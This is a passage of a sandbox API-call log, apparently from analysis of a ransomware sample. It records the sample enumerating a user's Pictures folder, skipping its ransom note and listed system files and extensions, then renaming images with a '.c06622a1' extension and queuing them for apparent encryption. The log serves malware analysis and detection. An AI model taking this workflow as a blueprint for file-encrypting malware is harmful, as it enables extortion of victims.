Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6e5c4a9e [0167.707] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4d2a7397 [0167.707] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x640c19f2 [0167.707] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3089f3fb [0167.710] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x37a0094, Length=0x80) returned 0x5a70cdd9 [0167.710] RtlComputeCrc32 (PartialCrc=0xcdd9, Buffer=0x37a0094, Length=0x80) returned 0x1637500d [0167.710] RtlComputeCrc32 (PartialCrc=0x500d, Buffer=0x37a0094, Length=0x80) returned 0x5422b36d [0167.710] RtlComputeCrc32 (PartialCrc=0xb36d, Buffer=0x37a0094, Length=0x80) returned 0x6d1503ba [0167.710] RtlComputeCrc32 (PartialCrc=0x3ba, Buffer=0x37a0094, Length=0x80) returned 0x55d7346a [0167.710] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x37a0020) returned 1 [0167.710] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32a2090) returned 1 [0167.710] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32b2098) returned 1 [0167.710] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x918b8fa0, ftCreationTime.dwHighDateTime=0x1d6eb2b, ftLastAccessTime.dwLowDateTime=0x918b8fa0, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x918b8fa0, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x7ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0167.710] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0167.710] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0167.711] FindClose (in: hFindFile=0x154208 | out: hFindFile=0x154208) returned 1 [0167.711] _wcsicmp (_Str1="backup", _Str2="ry57L") returned -16 [0167.711] wcslen (_String="backup") returned 0x6 [0167.711] _wcsicmp (_Str1="bak", _Str2="ry57L") returned -16 [0167.711] wcslen (_String="bak") returned 0x3 [0167.711] _wcsicmp (_Str1="back", _Str2="ry57L") returned -16 [0167.711] wcslen (_String="back") returned 0x4 [0167.711] _wcsicmp (_Str1="archive", _Str2="ry57L") returned -17 [0167.711] wcslen (_String="archive") returned 0x7 [0167.711] _wcsicmp (_Str1="bckp", _Str2="ry57L") returned -16 [0167.711] wcslen (_String="bckp") returned 0x4 [0167.711] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3282080) returned 1 [0167.711] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3480048) returned 1 [0167.713] FindNextFileW (in: hFindFile=0x1541c8, lpFindFileData=0x32e89c | out: lpFindFileData=0x32e89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a86d230, ftCreationTime.dwHighDateTime=0x1d5e0ea, ftLastAccessTime.dwLowDateTime=0xfaa5dff0, ftLastAccessTime.dwHighDateTime=0x1d5defb, ftLastWriteTime.dwLowDateTime=0xfaa5dff0, ftLastWriteTime.dwHighDateTime=0x1d5defb, nFileSizeHigh=0x0, nFileSizeLow=0x1865f, dwReserved0=0x0, dwReserved1=0x0, cFileName="teXGz5kx7jB2.jpg", cAlternateFileName="TEXGZ5~1.JPG")) returned 1 [0167.713] _wcsicmp (_Str1="teXGz5kx7jB2.jpg", _Str2="README.c06622a1.TXT") returned 2 [0167.713] wcsstr (_Str="teXGz5kx7jB2.jpg", _SubStr="README") returned 0x0 [0167.713] _wcsicmp (_Str1="autorun.inf", _Str2="teXGz5kx7jB2.jpg") returned -19 [0167.713] wcslen (_String="autorun.inf") returned 0xb [0167.713] _wcsicmp (_Str1="boot.ini", _Str2="teXGz5kx7jB2.jpg") returned -18 [0167.713] wcslen (_String="boot.ini") returned 0x8 [0167.713] _wcsicmp (_Str1="bootfont.bin", _Str2="teXGz5kx7jB2.jpg") returned -18 [0167.713] wcslen (_String="bootfont.bin") returned 0xc [0167.713] _wcsicmp (_Str1="bootsect.bak", _Str2="teXGz5kx7jB2.jpg") returned -18 [0167.713] wcslen (_String="bootsect.bak") returned 0xc [0167.713] _wcsicmp (_Str1="desktop.ini", _Str2="teXGz5kx7jB2.jpg") returned -16 [0167.713] wcslen (_String="desktop.ini") returned 0xb [0167.713] _wcsicmp (_Str1="iconcache.db", _Str2="teXGz5kx7jB2.jpg") returned -11 [0167.713] wcslen (_String="iconcache.db") returned 0xc [0167.713] _wcsicmp (_Str1="ntldr", _Str2="teXGz5kx7jB2.jpg") returned -6 [0167.713] wcslen (_String="ntldr") returned 0x5 [0167.713] _wcsicmp (_Str1="ntuser.dat", _Str2="teXGz5kx7jB2.jpg") returned -6 [0167.713] wcslen (_String="ntuser.dat") returned 0xa [0167.713] _wcsicmp (_Str1="ntuser.dat.log", _Str2="teXGz5kx7jB2.jpg") returned -6 [0167.713] wcslen (_String="ntuser.dat.log") returned 0xe [0167.713] _wcsicmp (_Str1="ntuser.ini", _Str2="teXGz5kx7jB2.jpg") returned -6 [0167.714] wcslen (_String="ntuser.ini") returned 0xa [0167.714] _wcsicmp (_Str1="thumbs.db", _Str2="teXGz5kx7jB2.jpg") returned 3 [0167.714] wcslen (_String="thumbs.db") returned 0x9 [0167.714] _wcsicmp (_Str1="386", _Str2="jpg") returned -55 [0167.714] wcslen (_String="386") returned 0x3 [0167.714] _wcsicmp (_Str1="adv", _Str2="jpg") returned -9 [0167.714] wcslen (_String="adv") returned 0x3 [0167.714] _wcsicmp (_Str1="ani", _Str2="jpg") returned -9 [0167.714] wcslen (_String="ani") returned 0x3 [0167.714] _wcsicmp (_Str1="bat", _Str2="jpg") returned -8 [0167.714] wcslen (_String="bat") returned 0x3 [0167.714] _wcsicmp (_Str1="bin", _Str2="jpg") returned -8 [0167.714] wcslen (_String="bin") returned 0x3 [0167.714] _wcsicmp (_Str1="cab", _Str2="jpg") returned -7 [0167.714] wcslen (_String="cab") returned 0x3 [0167.714] _wcsicmp (_Str1="cmd", _Str2="jpg") returned -7 [0167.714] wcslen (_String="cmd") returned 0x3 [0167.714] _wcsicmp (_Str1="com", _Str2="jpg") returned -7 [0167.714] wcslen (_String="com") returned 0x3 [0167.714] _wcsicmp (_Str1="cpl", _Str2="jpg") returned -7 [0167.714] wcslen (_String="cpl") returned 0x3 [0167.714] _wcsicmp (_Str1="cur", _Str2="jpg") returned -7 [0167.714] wcslen (_String="cur") returned 0x3 [0167.714] _wcsicmp (_Str1="deskthemepack", _Str2="jpg") returned -6 [0167.714] wcslen (_String="deskthemepack") returned 0xd [0167.714] _wcsicmp (_Str1="diagcab", _Str2="jpg") returned -6 [0167.714] wcslen (_String="diagcab") returned 0x7 [0167.714] _wcsicmp (_Str1="diagcfg", _Str2="jpg") returned -6 [0167.714] wcslen (_String="diagcfg") returned 0x7 [0167.714] _wcsicmp (_Str1="diagpkg", _Str2="jpg") returned -6 [0167.714] wcslen (_String="diagpkg") returned 0x7 [0167.714] _wcsicmp (_Str1="dll", _Str2="jpg") returned -6 [0167.715] wcslen (_String="dll") returned 0x3 [0167.715] _wcsicmp (_Str1="drv", _Str2="jpg") returned -6 [0167.715] wcslen (_String="drv") returned 0x3 [0167.715] _wcsicmp (_Str1="exe", _Str2="jpg") returned -5 [0167.715] wcslen (_String="exe") returned 0x3 [0167.715] _wcsicmp (_Str1="hlp", _Str2="jpg") returned -2 [0167.715] wcslen (_String="hlp") returned 0x3 [0167.715] _wcsicmp (_Str1="icl", _Str2="jpg") returned -1 [0167.715] wcslen (_String="icl") returned 0x3 [0167.715] _wcsicmp (_Str1="icns", _Str2="jpg") returned -1 [0167.715] wcslen (_String="icns") returned 0x4 [0167.715] _wcsicmp (_Str1="ico", _Str2="jpg") returned -1 [0167.715] wcslen (_String="ico") returned 0x3 [0167.715] _wcsicmp (_Str1="ics", _Str2="jpg") returned -1 [0167.715] wcslen (_String="ics") returned 0x3 [0167.715] _wcsicmp (_Str1="idx", _Str2="jpg") returned -1 [0167.715] wcslen (_String="idx") returned 0x3 [0167.715] _wcsicmp (_Str1="ldf", _Str2="jpg") returned 2 [0167.715] wcslen (_String="ldf") returned 0x3 [0167.715] _wcsicmp (_Str1="lnk", _Str2="jpg") returned 2 [0167.715] wcslen (_String="lnk") returned 0x3 [0167.715] _wcsicmp (_Str1="mod", _Str2="jpg") returned 3 [0167.715] wcslen (_String="mod") returned 0x3 [0167.715] _wcsicmp (_Str1="mpa", _Str2="jpg") returned 3 [0167.715] wcslen (_String="mpa") returned 0x3 [0167.715] _wcsicmp (_Str1="msc", _Str2="jpg") returned 3 [0167.715] wcslen (_String="msc") returned 0x3 [0167.715] _wcsicmp (_Str1="msp", _Str2="jpg") returned 3 [0167.715] wcslen (_String="msp") returned 0x3 [0167.715] _wcsicmp (_Str1="msstyles", _Str2="jpg") returned 3 [0167.715] wcslen (_String="msstyles") returned 0x8 [0167.715] _wcsicmp (_Str1="msu", _Str2="jpg") returned 3 [0167.715] wcslen (_String="msu") returned 0x3 [0167.716] _wcsicmp (_Str1="nls", _Str2="jpg") returned 4 [0167.716] wcslen (_String="nls") returned 0x3 [0167.716] _wcsicmp (_Str1="nomedia", _Str2="jpg") returned 4 [0167.716] wcslen (_String="nomedia") returned 0x7 [0167.716] _wcsicmp (_Str1="ocx", _Str2="jpg") returned 5 [0167.716] wcslen (_String="ocx") returned 0x3 [0167.716] _wcsicmp (_Str1="prf", _Str2="jpg") returned 6 [0167.716] wcslen (_String="prf") returned 0x3 [0167.716] _wcsicmp (_Str1="ps1", _Str2="jpg") returned 6 [0167.716] wcslen (_String="ps1") returned 0x3 [0167.716] _wcsicmp (_Str1="rom", _Str2="jpg") returned 8 [0167.716] wcslen (_String="rom") returned 0x3 [0167.716] _wcsicmp (_Str1="rtp", _Str2="jpg") returned 8 [0167.716] wcslen (_String="rtp") returned 0x3 [0167.716] _wcsicmp (_Str1="scr", _Str2="jpg") returned 9 [0167.716] wcslen (_String="scr") returned 0x3 [0167.716] _wcsicmp (_Str1="shs", _Str2="jpg") returned 9 [0167.716] wcslen (_String="shs") returned 0x3 [0167.716] _wcsicmp (_Str1="spl", _Str2="jpg") returned 9 [0167.716] wcslen (_String="spl") returned 0x3 [0167.716] _wcsicmp (_Str1="sys", _Str2="jpg") returned 9 [0167.716] wcslen (_String="sys") returned 0x3 [0167.716] _wcsicmp (_Str1="theme", _Str2="jpg") returned 10 [0167.716] wcslen (_String="theme") returned 0x5 [0167.716] _wcsicmp (_Str1="themepack", _Str2="jpg") returned 10 [0167.716] wcslen (_String="themepack") returned 0x9 [0167.716] _wcsicmp (_Str1="wpx", _Str2="jpg") returned 13 [0167.716] wcslen (_String="wpx") returned 0x3 [0167.716] _wcsicmp (_Str1="lock", _Str2="jpg") returned 2 [0167.716] wcslen (_String="lock") returned 0x4 [0167.716] _wcsicmp (_Str1="key", _Str2="jpg") returned 1 [0167.716] wcslen (_String="key") returned 0x3 [0167.716] _wcsicmp (_Str1="hta", _Str2="jpg") returned -2 [0167.717] wcslen (_String="hta") returned 0x3 [0167.717] _wcsicmp (_Str1="msi", _Str2="jpg") returned 3 [0167.717] wcslen (_String="msi") returned 0x3 [0167.717] _wcsicmp (_Str1="pdb", _Str2="jpg") returned 6 [0167.717] wcslen (_String="pdb") returned 0x3 [0167.717] _wcsicmp (_Str1="sqlite", _Str2="jpg") returned 9 [0167.717] wcslen (_String="sqlite") returned 0x6 [0167.717] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo")) returned 0x10 [0167.717] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3480048 [0167.717] wcscpy (in: _Dest=0x3480048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo" [0167.717] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo") returned 0x48 [0167.717] wcscpy (in: _Dest=0x34800da, _Source="teXGz5kx7jB2.jpg" | out: _Dest="teXGz5kx7jB2.jpg") returned="teXGz5kx7jB2.jpg" [0167.717] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\teXGz5kx7jB2.jpg", dwFileAttributes=0x80) returned 1 [0167.718] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\teXGz5kx7jB2.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\texgz5kx7jb2.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0167.718] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.718] ReadFile (in: hFile=0x1c0, lpBuffer=0x32e724, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e7b4, lpOverlapped=0x0 | out: lpBuffer=0x32e724*, lpNumberOfBytesRead=0x32e7b4*=0x90, lpOverlapped=0x0) returned 1 [0167.719] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e724, Length=0x80) returned 0xc5b21fe6 [0167.719] RtlComputeCrc32 (PartialCrc=0x1fe6, Buffer=0x32e724, Length=0x80) returned 0xbf5fca72 [0167.719] RtlComputeCrc32 (PartialCrc=0xca72, Buffer=0x32e724, Length=0x80) returned 0x70e624ab [0167.719] RtlComputeCrc32 (PartialCrc=0x24ab, Buffer=0x32e724, Length=0x80) returned 0xc0761812 [0167.719] RtlComputeCrc32 (PartialCrc=0x1812, Buffer=0x32e724, Length=0x80) returned 0xf973cb8b [0167.719] CloseHandle (hObject=0x1c0) returned 1 [0167.719] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3282080 [0167.720] wcscpy (in: _Dest=0x3282080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\teXGz5kx7jB2.jpg" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\teXGz5kx7jB2.jpg") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\teXGz5kx7jB2.jpg" [0167.720] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\teXGz5kx7jB2.jpg") returned 0x59 [0167.720] wcscpy (in: _Dest=0x3282132, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0167.720] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\teXGz5kx7jB2.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\texgz5kx7jb2.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\teXGz5kx7jB2.jpg.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\texgz5kx7jb2.jpg.c06622a1"), dwFlags=0x8) returned 1 [0167.726] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\teXGz5kx7jB2.jpg.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\texgz5kx7jb2.jpg.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1c0 [0167.726] CreateIoCompletionPort (FileHandle=0x1c0, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0167.726] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3830020 [0167.734] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4e3d1ea [0167.734] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x631dbb26 [0167.734] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x683196e9 [0167.734] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x290b2466 [0167.734] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6236d339 [0167.734] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x740ad2c9 [0167.734] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5b3fc562 [0167.734] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x71333970 [0167.737] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3830094, Length=0x80) returned 0x5bfc0ec1 [0167.737] RtlComputeCrc32 (PartialCrc=0xec1, Buffer=0x3830094, Length=0x80) returned 0x1a8f435c [0167.737] RtlComputeCrc32 (PartialCrc=0x435c, Buffer=0x3830094, Length=0x80) returned 0x74e4aba3 [0167.737] RtlComputeCrc32 (PartialCrc=0xaba3, Buffer=0x3830094, Length=0x80) returned 0x140027c [0167.737] RtlComputeCrc32 (PartialCrc=0x27c, Buffer=0x3830094, Length=0x80) returned 0x5350dff3 [0167.737] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3830020) returned 1 [0167.737] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3480048) returned 1 [0167.737] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3282080) returned 1 [0167.737] FindNextFileW (in: hFindFile=0x1541c8, lpFindFileData=0x32e89c | out: lpFindFileData=0x32e89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efff0d0, ftCreationTime.dwHighDateTime=0x1d5dff7, ftLastAccessTime.dwLowDateTime=0x85ddc0f0, ftLastAccessTime.dwHighDateTime=0x1d5e637, ftLastWriteTime.dwLowDateTime=0x85ddc0f0, ftLastWriteTime.dwHighDateTime=0x1d5e637, nFileSizeHigh=0x0, nFileSizeLow=0x109f6, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZjSGQQ7rSaytFk_.gif", cAlternateFileName="ZJSGQQ~1.GIF")) returned 1 [0167.737] _wcsicmp (_Str1="ZjSGQQ7rSaytFk_.gif", _Str2="README.c06622a1.TXT") returned 8 [0167.737] wcsstr (_Str="ZjSGQQ7rSaytFk_.gif", _SubStr="README") returned 0x0 [0167.737] _wcsicmp (_Str1="autorun.inf", _Str2="ZjSGQQ7rSaytFk_.gif") returned -25 [0167.738] wcslen (_String="autorun.inf") returned 0xb [0167.738] _wcsicmp (_Str1="boot.ini", _Str2="ZjSGQQ7rSaytFk_.gif") returned -24 [0167.738] wcslen (_String="boot.ini") returned 0x8 [0167.738] _wcsicmp (_Str1="bootfont.bin", _Str2="ZjSGQQ7rSaytFk_.gif") returned -24 [0167.738] wcslen (_String="bootfont.bin") returned 0xc [0167.738] _wcsicmp (_Str1="bootsect.bak", _Str2="ZjSGQQ7rSaytFk_.gif") returned -24 [0167.738] wcslen (_String="bootsect.bak") returned 0xc [0167.738] _wcsicmp (_Str1="desktop.ini", _Str2="ZjSGQQ7rSaytFk_.gif") returned -22 [0167.738] wcslen (_String="desktop.ini") returned 0xb [0167.738] _wcsicmp (_Str1="iconcache.db", _Str2="ZjSGQQ7rSaytFk_.gif") returned -17 [0167.738] wcslen (_String="iconcache.db") returned 0xc [0167.738] _wcsicmp (_Str1="ntldr", _Str2="ZjSGQQ7rSaytFk_.gif") returned -12 [0167.738] wcslen (_String="ntldr") returned 0x5 [0167.738] _wcsicmp (_Str1="ntuser.dat", _Str2="ZjSGQQ7rSaytFk_.gif") returned -12 [0167.738] wcslen (_String="ntuser.dat") returned 0xa [0167.738] _wcsicmp (_Str1="ntuser.dat.log", _Str2="ZjSGQQ7rSaytFk_.gif") returned -12 [0167.738] wcslen (_String="ntuser.dat.log") returned 0xe [0167.738] _wcsicmp (_Str1="ntuser.ini", _Str2="ZjSGQQ7rSaytFk_.gif") returned -12 [0167.738] wcslen (_String="ntuser.ini") returned 0xa [0167.738] _wcsicmp (_Str1="thumbs.db", _Str2="ZjSGQQ7rSaytFk_.gif") returned -6 [0167.738] wcslen (_String="thumbs.db") returned 0x9 [0167.738] _wcsicmp (_Str1="386", _Str2="gif") returned -52 [0167.738] wcslen (_String="386") returned 0x3 [0167.738] _wcsicmp (_Str1="adv", _Str2="gif") returned -6 [0167.738] wcslen (_String="adv") returned 0x3 [0167.738] _wcsicmp (_Str1="ani", _Str2="gif") returned -6 [0167.738] wcslen (_String="ani") returned 0x3 [0167.738] _wcsicmp (_Str1="bat", _Str2="gif") returned -5 [0167.738] wcslen (_String="bat") returned 0x3 [0167.738] _wcsicmp (_Str1="bin", _Str2="gif") returned -5 [0167.738] wcslen (_String="bin") returned 0x3 [0167.738] _wcsicmp (_Str1="cab", _Str2="gif") returned -4 [0167.739] wcslen (_String="cab") returned 0x3 [0167.739] _wcsicmp (_Str1="cmd", _Str2="gif") returned -4 [0167.739] wcslen (_String="cmd") returned 0x3 [0167.739] _wcsicmp (_Str1="com", _Str2="gif") returned -4 [0167.739] wcslen (_String="com") returned 0x3 [0167.739] _wcsicmp (_Str1="cpl", _Str2="gif") returned -4 [0167.739] wcslen (_String="cpl") returned 0x3 [0167.739] _wcsicmp (_Str1="cur", _Str2="gif") returned -4 [0167.739] wcslen (_String="cur") returned 0x3 [0167.739] _wcsicmp (_Str1="deskthemepack", _Str2="gif") returned -3 [0167.739] wcslen (_String="deskthemepack") returned 0xd [0167.739] _wcsicmp (_Str1="diagcab", _Str2="gif") returned -3 [0167.739] wcslen (_String="diagcab") returned 0x7 [0167.739] _wcsicmp (_Str1="diagcfg", _Str2="gif") returned -3 [0167.739] wcslen (_String="diagcfg") returned 0x7 [0167.739] _wcsicmp (_Str1="diagpkg", _Str2="gif") returned -3 [0167.739] wcslen (_String="diagpkg") returned 0x7 [0167.739] _wcsicmp (_Str1="dll", _Str2="gif") returned -3 [0167.739] wcslen (_String="dll") returned 0x3 [0167.739] _wcsicmp (_Str1="drv", _Str2="gif") returned -3 [0167.739] wcslen (_String="drv") returned 0x3 [0167.739] _wcsicmp (_Str1="exe", _Str2="gif") returned -2 [0167.739] wcslen (_String="exe") returned 0x3 [0167.739] _wcsicmp (_Str1="hlp", _Str2="gif") returned 1 [0167.739] wcslen (_String="hlp") returned 0x3 [0167.739] _wcsicmp (_Str1="icl", _Str2="gif") returned 2 [0167.739] wcslen (_String="icl") returned 0x3 [0167.739] _wcsicmp (_Str1="icns", _Str2="gif") returned 2 [0167.739] wcslen (_String="icns") returned 0x4 [0167.740] _wcsicmp (_Str1="ico", _Str2="gif") returned 2 [0167.740] wcslen (_String="ico") returned 0x3 [0167.740] _wcsicmp (_Str1="ics", _Str2="gif") returned 2 [0167.740] wcslen (_String="ics") returned 0x3 [0167.740] _wcsicmp (_Str1="idx", _Str2="gif") returned 2 [0167.740] wcslen (_String="idx") returned 0x3 [0167.740] _wcsicmp (_Str1="ldf", _Str2="gif") returned 5 [0167.740] wcslen (_String="ldf") returned 0x3 [0167.740] _wcsicmp (_Str1="lnk", _Str2="gif") returned 5 [0167.740] wcslen (_String="lnk") returned 0x3 [0167.740] _wcsicmp (_Str1="mod", _Str2="gif") returned 6 [0167.740] wcslen (_String="mod") returned 0x3 [0167.740] _wcsicmp (_Str1="mpa", _Str2="gif") returned 6 [0167.740] wcslen (_String="mpa") returned 0x3 [0167.740] _wcsicmp (_Str1="msc", _Str2="gif") returned 6 [0167.740] wcslen (_String="msc") returned 0x3 [0167.740] _wcsicmp (_Str1="msp", _Str2="gif") returned 6 [0167.740] wcslen (_String="msp") returned 0x3 [0167.740] _wcsicmp (_Str1="msstyles", _Str2="gif") returned 6 [0167.740] wcslen (_String="msstyles") returned 0x8 [0167.740] _wcsicmp (_Str1="msu", _Str2="gif") returned 6 [0167.740] wcslen (_String="msu") returned 0x3 [0167.740] _wcsicmp (_Str1="nls", _Str2="gif") returned 7 [0167.740] wcslen (_String="nls") returned 0x3 [0167.740] _wcsicmp (_Str1="nomedia", _Str2="gif") returned 7 [0167.740] wcslen (_String="nomedia") returned 0x7 [0167.740] _wcsicmp (_Str1="ocx", _Str2="gif") returned 8 [0167.740] wcslen (_String="ocx") returned 0x3 [0167.740] _wcsicmp (_Str1="prf", _Str2="gif") returned 9 [0167.740] wcslen (_String="prf") returned 0x3 [0167.740] _wcsicmp (_Str1="ps1", _Str2="gif") returned 9 [0167.740] wcslen (_String="ps1") returned 0x3 [0167.740] _wcsicmp (_Str1="rom", _Str2="gif") returned 11 [0167.740] wcslen (_String="rom") returned 0x3 [0167.741] _wcsicmp (_Str1="rtp", _Str2="gif") returned 11 [0167.741] wcslen (_String="rtp") returned 0x3 [0167.741] _wcsicmp (_Str1="scr", _Str2="gif") returned 12 [0167.741] wcslen (_String="scr") returned 0x3 [0167.741] _wcsicmp (_Str1="shs", _Str2="gif") returned 12 [0167.741] wcslen (_String="shs") returned 0x3 [0167.741] _wcsicmp (_Str1="spl", _Str2="gif") returned 12 [0167.741] wcslen (_String="spl") returned 0x3 [0167.741] _wcsicmp (_Str1="sys", _Str2="gif") returned 12 [0167.741] wcslen (_String="sys") returned 0x3 [0167.741] _wcsicmp (_Str1="theme", _Str2="gif") returned 13 [0167.741] wcslen (_String="theme") returned 0x5 [0167.741] _wcsicmp (_Str1="themepack", _Str2="gif") returned 13 [0167.741] wcslen (_String="themepack") returned 0x9 [0167.741] _wcsicmp (_Str1="wpx", _Str2="gif") returned 16 [0167.741] wcslen (_String="wpx") returned 0x3 [0167.741] _wcsicmp (_Str1="lock", _Str2="gif") returned 5 [0167.741] wcslen (_String="lock") returned 0x4 [0167.741] _wcsicmp (_Str1="key", _Str2="gif") returned 4 [0167.741] wcslen (_String="key") returned 0x3 [0167.741] _wcsicmp (_Str1="hta", _Str2="gif") returned 1 [0167.741] wcslen (_String="hta") returned 0x3 [0167.741] _wcsicmp (_Str1="msi", _Str2="gif") returned 6 [0167.741] wcslen (_String="msi") returned 0x3 [0167.741] _wcsicmp (_Str1="pdb", _Str2="gif") returned 9 [0167.741] wcslen (_String="pdb") returned 0x3 [0167.741] _wcsicmp (_Str1="sqlite", _Str2="gif") returned 12 [0167.741] wcslen (_String="sqlite") returned 0x6 [0167.741] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo")) returned 0x10 [0167.741] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3480048 [0167.742] wcscpy (in: _Dest=0x3480048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo") 